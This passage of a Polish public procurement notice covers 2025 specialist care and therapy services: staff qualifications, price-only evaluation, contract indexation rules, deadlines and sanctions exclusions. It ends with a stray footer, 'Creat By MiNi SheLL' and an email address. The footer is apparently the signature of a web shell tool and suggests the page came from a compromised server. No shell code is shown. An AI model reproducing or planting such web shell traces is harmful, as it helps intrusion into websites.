wyboru oferty najkorzystniejszej z zastosowaniem aukcji elektronicznej, ani nie będzie prowadził negocjacji.<br/>6.	Zamawiający nie wymaga składania oferty w postaci katalogów elektronicznych i dołączania katalogów elektronicznych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85000000-9 - Usługi w zakresie zdrowia i opieki społecznej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85121200-5 - Specjalistyczne usługi medyczne</p> <p class="mb-0">85121270-6 - Usługi psychiatryczne lub psychologiczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-02 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">3.	Maksymalna ilość punktów, jaką można uzyskać - 100,00 pkt.<br/>4.	Punkty zostaną przyznane z dokładnością do dwóch miejsc po przecinku.<br/>5.	Zamówienie zostanie udzielone wykonawcy, który spełni wszystkie wymagania postawione w SWZ oraz którego oferta otrzyma największą liczbę punktów w kryterium oceny ofert.<br/>6.	W powyższym przypadku Zamawiający na podstawie art. 246 ust. 2. ustawy Prawo zamówień publicznych zastosował kryterium ceny jako jedyne kryterium oceny ofert, ponieważ w opisie przedmiotu zamówienia zostały określone wymagania jakościowe odnoszące się do przedmiotu zamówienia – parametry jakościowe poszczególnych elementów zamawianych usług.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Potencjał kadrowy: Wykonawca spełni warunek, jeżeli wykaże, że dysponuje następującymi osobami:<br/>a)	Dla zadania 1 - rehabilitacja / fizykoterapia - co najmniej jedną osobą posiadającą kwalifikacje do wykonywania zawodu rehabilitanta /fizjoterapeuty<br/>b)	Dla zadania 2 - terapia logopedyczna - co najmniej jedną osobą posiadającą kwalifikacje do wykonywania zawodu logopedy<br/>c)	Dla zadania 3 - terapia pedagogiczna co najmniej jedną osobą posiadającą kwalifikacje do wykonywania zawodu pedagoga<br/>d)	Dla zadania 4 - terapia psychologiczna co najmniej jedną osobą posiadającą kwalifikacje do wykonywania zawodu psychologa<br/>e)	Dla zadania 5 – muzykoterapia co najmniej jedną osobą posiadającą kwalifikacje do wykonywania zawodu terapeuty w zakresie muzykoterapii<br/>f)	Dla zadania 6 - terapia zajęciowa co najmniej jedną osobą posiadającą kwalifikacje do wykonywania zawodu terapeuty terapii zajęciowej<br/>g)	Dla zadania 7 - trening umiejętności społecznych co najmniej jedną osobą posiadającą kwalifikacje do wykonywania zawodu terapeuty umiejętności społecznych<br/>h)	Dla zadania 8 - integracja sensoryczna co najmniej jedną osobą posiadającą kwalifikacje do wykonywania zawodu terapeuty Integracji sensorycznej<br/>i)	Dla zadania 9 - terapia neurologopedyczna co najmniej jedną osobą posiadającą kwalifikacje do wykonywania zawodu neurologopedy,<br/>Uwaga! Zgodnie z Rozporządzeniem Ministra Polityki Społecznej z dnia 22 września 2005 r. w sprawie specjalistycznych usług opiekuńczych (Dz.U. z 2024 r., poz. 816) Specjalistyczne usługi są świadczone przez osoby posiadające kwalifikacje do wykonywania zawodu: pracownika socjalnego, psychologa, pedagoga, logopedy, terapeuty zajęciowego, pielęgniarki, asystenta osoby niepełnosprawnej, opiekunki środowiskowej, specjalisty w zakresie rehabilitacji medycznej, fizjoterapeuty lub innego zawodu dającego wiedzę i umiejętności pozwalające świadczyć określone specjalistyczne usługi. Osoby świadczące specjalistyczne usługi dla osób z zaburzeniami psychicznymi muszą posiadać co najmniej 3 miesięczne doświadczenie zawodowe w pracy z osobami z zaburzeniami psychicznymi zdobyte w jednej z następujących jednostek:<br/>1.	szpitalu psychiatrycznym;<br/>2.	jednostce organizacyjnej pomocy społecznej dla osób z zaburzeniami psychicznymi;<br/>3.	placówce terapii lub placówce oświatowej, do której uczęszczają dzieci z zaburzeniami rozwoju lub upośledzeniem umysłowym;<br/>4.	ośrodku terapeutyczno-edukacyjno-wychowawczym;<br/>5.	warsztacie terapii zajęciowej;<br/>6.	innej jednostce niż wymienione w pkt 1-5 świadczącej specjalistyczne usługi dla osób z zaburzeniami psychicznymi.<br/>a)	potwierdzone na piśmie oraz inne dokumenty potwierdzające kwalifikacje i umiejętności zawodowe. <br/>Osoby świadczące usługi posiadają przeszkolenie i doświadczenie w zakresie:<br/>- umiejętności kształtowania motywacji do akceptowanych przez otoczenie zachowań, <br/>- kształtowania nawyków celowej aktywności, <br/>- prowadzenia treningu zachowań społecznych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z art. 273 ust. 1 zamawiający nie żąda złożenia podmiotowych środków dowodowych na potwierdzenie:<br/>a)	braku podstaw wykluczenia,<br/>b)	spełniania warunków udziału w postępowaniu.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 8.	Dokumenty, które należy złożyć wraz z ofertą (elektronicznie):<br/>1)	Podpisany (elektronicznie) Wypełniony formularz oferty – załącznik nr 1;<br/>2)	Oświadczenie, o którym mowa z art. 125 ust. 1 ustawy PZP, o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu na dzień składania ofert – załącznik nr 2 do SWZ; <br/>3)	W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia:<br/>a)	oświadczenia, o których mowa w rozdziale VI, pkt 15, ppkt 2) i 4) SWZ,<br/>b)	pełnomocnictwo, o którym mowa w rozdziale VI, pkt 15, ppkt 1) SWZ;<br/>4)	W przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby:<br/>a)	zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w rozdziale X pkt 2, ppkt 3) SWZ, <br/>b)	oświadczenie, o którym mowa w rozdziale X pkt 2 ppkt 5) SWZ; <br/>5)	Pełnomocnictwo do podpisania oferty - jeżeli dotyczy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 15.	W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia (w tym spółka cywilna):<br/>1)	Zgodnie z art. 58 ust. 2 ustawy Prawo zamówień publicznych, ustanawiają oni pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2)	Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy PZP, składa wraz z ofertą, każdy z wykonawców wspólnie ubiegający się o udzielenie zamówienia. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3)	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>4)	W przypadku, o którym mowa w ppkt. 3) dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy, usługi wykonają poszczególni Wykonawcy – art. 117 ust. 4 ustawy Prawo zamówień publicznych. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający wymaga, aby wybrany wykonawca zawarł z nim umowę na warunkach określonych w projekcie umowy stanowiącym załącznik nr 3 do SWZ. <br/>1.	Strony uprawnione są do zmiany wynagrodzenia umownego należnego Wykonawcy zgodnie z dyspozycją art. 439 pkt 1 ustawy Pzp w przypadku zmiany poziomu cen materiałów lub kosztów związanych z realizacją zamówienia.<br/>2.	Strony uprawnione są do waloryzacji wynagrodzenia umownego Wykonawcy określonej w ust. 2 powyżej na poniższych zasadach:<br/>1)	początkowy termin ustalenia zmiany wynagrodzenia może nastąpić po upływie 6 miesięcy od dnia zawarcia Umowy;<br/>2)	jeżeli Umowa została zawarta po upływie 180 dni od dnia upływu terminu składania ofert, początkowym terminem ustalenia zmiany wynagrodzenia jest dzień otwarcia ofert;<br/>3)	kolejne zmiany wynagrodzenia umownego nie mogą występować częściej niż po upływie 6 miesięcy od ostatniej zmiany wynagrodzenia umownego spowodowanego zmianą cen materiałów lub kosztów związanych z realizacją Umowy;<br/>3.	W sytuacji wystąpienia okoliczności wskazanych w ust. 2 powyżej Wykonawca składa pisemny wniosek o zmianę Umowy w zakresie zmiany poziomu cen materiałów lub kosztów związanych z realizacją zamówienia.<br/>4.	Wniosek, o którym mowa w ust. 4 powyżej, powinien zawierać wyczerpujące uzasadnienie faktyczne i prawne oraz dokładne wyliczenie kwoty wynagrodzenia Wykonawcy po zmianie Umowy; w szczególności Wykonawca będzie zobowiązany wykazać związek pomiędzy wnioskowaną kwotą podwyższenia wynagrodzenia umownego, a wpływem zmiany poziomu cen materiałów lub kosztów związanych z realizacją zamówienia na kalkulację ceny ofertowej. Wniosek powinien obejmować jedynie te dodatkowe koszty realizacji zamówienia, które Wykonawca obowiązkowo ponosi w związku ze zmianą poziomu cen materiałów lub kosztów związanych bezpośrednio z realizacją zamówienia. Uwzględnia się wyłącznie te koszty i ceny, których poziom wzrósł o co najmniej 20% od dnia wskazanego w ust. 3 powyżej i jedynie w takim zakresie, w jakim koszty i ceny przekładają się bezpośrednio na realizację wyłącznie zamówienia objętego Umową. Zmiana wysokości wynagrodzenia nie przekroczy połowy wzrostu cen lub kosztów związanych realizacją zamówienia, a łącznie stanowić będzie nie więcej niż 10% względem wynagrodzenia określonego w ofercie Wykonawcy.<br/>5.	Strony są uprawnione do waloryzacji wynagrodzenia także w przypadku, gdy w dniu złożenia wniosku o waloryzację wskaźnik inflacji, tj. wskaźnik cen towarów i usług konsumpcyjnych ogłaszany w komunikacie Prezesa Głównego Urzędu Statystycznego, przekroczy 10% w stosunku do odpowiednio:<br/>1)	dnia zawarcia Umowy – w przypadku określonym w ust. 3 pkt 1 powyżej,<br/>2)	dnia upływu terminu składania ofert – w przypadku określonym w ust. 3 pkt 2 powyżej,<br/>3)	dnia ostatniej zmiany wynagrodzenia umownego spowodowanego zmianą cen materiałów lub kosztów – w przypadku określonym w ust. 4 pkt 3 powyżej;<br/>6.	Każdej ze Stron przysługiwać będzie prawo do żądania odpowiednio zwiększenia wynagrodzenia Wykonawcy lub jego obniżenia adekwatnie do zmian wskaźnika inflacji, o którym mowa w ust. 6 powyżej, przy czym jedynie o 50% różnicy pomiędzy wskaźnikiem z miesiąca waloryzacji a wskaźnikiem z miesiąca odniesienia.<br/>7.	Maksymalna, łączna wartość zmiany wynagrodzenia, w okresie realizacji zamówienia jaką dopuszcza Zamawiający w efekcie zastosowania postanowień o zasadach wprowadzania zmian wysokości wynagrodzenia w wyniku waloryzacji, nie może być wyższa niż 10% względem wynagrodzenia określonego w ofercie Wykonawcy.<br/>Pozostałe zapisy w SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-30 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1. Wykonawca składa ofertę - formularz oferty stanowi załącznik nr 1 do SWZ - wraz z wymaganymi oświadczeniami i/lub dokumentami za pośrednictwem Platformy e-Zamówienia pod adresem: https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-30 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-01-28</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 4.	Zgodnie z art. 7 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2024 r., poz. 507) z postępowania o udzielenie zamówienia publicznego prowadzonego na podstawie ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych wyklucza się:<br/>a)	Wykonawcę wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3,<br/>b)	Wykonawcę, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2023 r. poz. 1124 z późn. zm.) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3;<br/>c) Wykonawcę, którego jednostką dominującą w rozumieniu art. 3 ust 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2023 r. poz. 120 z późn. zm.) jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostka dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3. <br/>(Art. 1 pkt 3 – W celu przeciwdziałania wspieraniu agresji Federacji Rosyjskiej na Ukrainę rozpoczętej w dniu 24 lutego 2022 r., wobec osób i podmiotów wpisanych na listę, o której mowa w art. 2, stosuje się: wykluczenie z postępowania o udzielenie zamówienia publicznego lub konkursu prowadzonego na podstawie ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2024 poz. 1320)).<br/><br/><br/>Termin realizacji przedmiotu umowy: od dnia podpisania umowy nie wcześniej niż od 02.01.2025 r. do 31.12.2025 r., wg potrzeb Zamawiającego.

Creat By MiNi SheLL
Email: jattceo@gmail.com